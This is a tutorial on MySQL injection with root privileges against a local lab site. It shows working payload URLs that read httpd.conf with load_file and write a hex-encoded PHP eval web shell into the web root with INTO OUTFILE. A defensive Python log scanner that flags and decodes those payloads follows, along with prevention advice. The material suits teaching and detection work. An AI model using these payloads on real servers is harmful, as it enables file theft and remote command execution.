First we find an injection point. I use my own local environment for the demonstration; please don't mess around with other people's sites.
http://localhost/pentest/sql/sql_injection_get.php?id=1
We find that the database connection has root privileges, so we try to write a web shell directly.
First, find the Web site's home directory:
Database directory: D:\wamp\bin\mysql\mysql5.5.20\data\
Judging from this path, the server is probably WampServer, with the httpd.conf file at d:/wamp/bin/apache/apache2.2.21/conf/httpd.conf
http://localhost/pentest/sql/sql_injection_get.php?id=1' and 1=2 union select load_file('d:/wamp/bin/apache/Apache2.2.21/conf/httpd.conf') from user--+
If this is unsuccessful, it is recommended that you convert the path to hex: load_file(0X443A5C77616D705C62696E5C6170616368655C417061636865322E322E32315C636F6E665C68747470642E636F6E66)
Found Site Directory: d:/wamp/www
We try to write the file:
http://localhost/pentest/sql/sql_injection_get.php?id=1' and 1=2 union select 1,2,0x3c3f706870206576616c28245f504f53545b27636d64275d293b3f3e into outfile 'd:/wamp/www/xx.php' from user--+
Hex encoding of <?php eval($_POST['cmd']);?>: 0x3c3f706870206576616c28245f504f53545b27636d64275d293b3f3e
Then visit: http://localhost/xx.php
MySQL injection with root privileges: directly writing a one-line web shell
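From the defender's side, the requests above leave a recognizable trace in the web server's access log. The following is an added example, not code from the original post: it URL-decodes each logged query string, flags load_file( and into outfile, and decodes long hex literals so that a hidden path or PHP body becomes readable. The log lines are constructed samples in an assumed Apache combined-log layout; the two hex values are the ones quoted on this page.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Signals for the two MySQL file primitives shown on this page, plus long hex
# literals, which hide a path or payload from naive keyword filters.
FILE_READ = re.compile(r"load_file\s*\(", re.I)
FILE_WRITE = re.compile(r"into\s+(?:out|dump)file", re.I)
HEX_LITERAL = re.compile(r"0x((?:[0-9a-f]{2}){8,})", re.I)
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def decode_hex_literals(text):
    """Decode every long 0x... literal in text to a readable string."""
    return [bytes.fromhex(m.group(1)).decode("latin-1")
            for m in HEX_LITERAL.finditer(text)]

def inspect_line(line):
    """Return a finding for one access-log line, or None if nothing matches."""
    m = REQUEST.search(line)
    if not m:
        return None
    query = unquote_plus(urlsplit(m.group(1)).query)
    decoded = decode_hex_literals(query)
    tags = []
    if FILE_READ.search(query):
        tags.append("file-read")
    if FILE_WRITE.search(query):
        tags.append("file-write")
    if any("<?php" in d.lower() for d in decoded):
        tags.append("php-in-hex")
    return {"tags": tags, "decoded": decoded} if tags else None

# Constructed sample log lines (not real traffic); the hex values are the two
# literals quoted on this page.
HEX_PATH = "0x443A5C77616D705C62696E5C6170616368655C417061636865322E322E32315C636F6E665C68747470642E636F6E66"
HEX_BODY = "0x3c3f706870206576616c28245f504f53545b27636d64275d293b3f3e"
PREFIX = '127.0.0.1 - - [01/Jan/2024:10:00:00 +0000] "GET /pentest/sql/sql_injection_get.php?id=1'
SAMPLE_LOG = [
    PREFIX + ' HTTP/1.1" 200 312',
    PREFIX + "%27%20and%201=2%20union%20select%20load_file(" + HEX_PATH
           + ')%20from%20user--+ HTTP/1.1" 200 9120',
    PREFIX + "%27%20and%201=2%20union%20select%201,2," + HEX_BODY
           + '%20into%20outfile%20%27d:/wamp/www/xx.php%27%20from%20user--+ HTTP/1.1" 200 0',
]

def scan(lines):
    """Return (line_number, finding) for every suspicious line."""
    return [(n, f) for n, l in enumerate(lines, 1) if (f := inspect_line(l))]

if __name__ == "__main__":
    for n, finding in scan(SAMPLE_LOG):
        print(n, finding["tags"], finding["decoded"])
```

Detection complements prevention: a parameterized query removes the injection itself, and an application account without the MySQL FILE privilege (or a restrictive secure_file_priv setting) removes the file read and write primitives.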